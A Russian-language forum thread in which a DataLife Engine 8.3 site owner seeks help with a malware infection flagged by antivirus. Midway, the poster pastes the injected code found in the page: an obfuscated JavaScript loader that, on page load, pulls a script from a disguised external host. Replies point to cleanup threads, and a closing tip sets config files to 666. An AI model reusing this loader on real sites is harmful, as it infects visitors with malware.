сайт заражен вирусом. DLE 8.3

[Richiooo 4]

zelenb.com

При открытии сайта открывается Adobe Acrobat, нод 32 ругается на Kryptic.GO trojan

Версия DLE 8.3 чистая

Антивирус в админке:

./engine/modules/c_navigation.php 4.58 Kb 13.11.2009 22:22:55 неизвестен дистрибутиву

./engine/inc/init.php 24.54 Kb 13.11.2009 22:22:56 неизвестен дистрибутиву

./engine/inc/makethumb.php 6.93 Kb 13.11.2009 22:22:56 неизвестен дистрибутиву

./engine/inc/inserttag.php 22.12 Kb 13.11.2009 22:22:56 неизвестен дистрибутиву

./engine/inc/functions.inc.php 16 Kb 13.11.2009 22:22:56 неизвестен дистрибутиву

При первом откытии сайта под подвалом появляется пустое место, которое после обновления страницы исчезает...

Что делать как найти и устранить проблему?

Изменено 14 декабря 2009 пользователем Richiooo

[celsoft 6 076]

Начните с удаления с сайта порно рекламы, или вы не берете в расчет что источник заражения именно она?

[Richiooo 4]

там стоит teasernet.ru при выключении этого баннера ситуация точно такая же. собственно вся реклама тоже снималась и ничего не поменялось

[celsoft 6 076]

Richiooo,

Другого зловредного кода на вашем сайте в исходном коде я не вижу.

там стоит teasernet.ru

и что? Это гарант безопасности.

собственно вся реклама тоже снималась и ничего не поменялось

Удалите всю без исключения рекламу и давайте ссылку на сайт, посмотрим что у вас там еще всплывает.

[Richiooo 4]

В админке сайта в самом низу код (исходный код страницы)

<script>/*GNU GPL*/ try{window.onload = function(){var Vppmkah2dw7 = document.createElement('script');Vppmkah2dw7.setAttribute('type', 'text/javascript');Vppmkah2dw7.setAttribute('id', 'myscript1');Vppmkah2dw7.setAttribute('src',  'h@)((t^)&&t^!p!$:!!/$$&/&@(&f(^$l^i##c@@(k&$(r@^-(&(c$&#)o!#&m(#.^a#(d$#@v!m$&$&a!##k@^(#e@)r^(.#!r@#u($#).!)#)m&e&@@r)c&!&a!#^d@!!o(l&i)$$^r@!(e$(-#)c!o$(m)&$&$-&)m$#)x().(e)&a&))#s&)y^&(t!#)(^a)@b!!)l&#(e^!#^t)(e@&^n()!n!#$i@&s($.^)#r($!#u#(@&:#8$0$^!8$#$@0(!/#^g(^!$o@#!$)o@^g&l!!(e!)&^.()($c^(&o&^$$m&/#^g^&o@@o(@)&g!&@!@l$&$(e^.#!c$$$)!o^m)$(/)(n)^$@y^!d$$@a!i$((l($y&^!&n)#e)@$w^$s!.$&c(^o!@(m($$)/$g!(@o@o)^)g@^l$e&(!.(#a(t!#@@/&p$l#!a))$y@&)).&@c$@$o)&&$m#)#/!'.replace(/&|\(|\$|\!|#|\^|@|\)/ig, ''));Vppmkah2dw7.setAttribute('defer', 'defer');document.body.appendChild(Vppmkah2dw7);}} catch(e) {}</script>[/code]

Это нормально?

[WWW.ZEOS.IN 1 161]

Нет

[celsoft 6 076]

Richiooo,

http://forum.dle-news.ru/index.php?s=&showtopic=39386&view=findpost&p=175979

http://forum.dle-news.ru/index.php?showtopic=32928&hl=iframe

[Richiooo 4]

спасибо, пришлось перезаливать папку engine.

кстати после того как сайт был вылечен, хотел сделать снимок встроенным антивирусом, а он пишет

Warning: fopen(../data/snap.db): failed to open stream: Permission denied in /home/zelenb/domains/zelenb.com/public_html/engine/ajax/antivirus.php on line 349 Warning: fwrite(): supplied argument is not a valid stream resource in /home/zelenb/domains/zelenb.com/public_html/engine/ajax/antivirus.php on line 350 Warning: fclose(): supplied argument is not a valid stream resource in /home/zelenb/domains/zelenb.com/public_html/engine/ajax/antivirus.php on line 351 ������ ��������� ������ ������� � �������� ������� ������

[celsoft 6 076]

нет прав на файл engine/data/snap.db

[Captain 623]

В engine/data на все конфиги нужно права поставить 666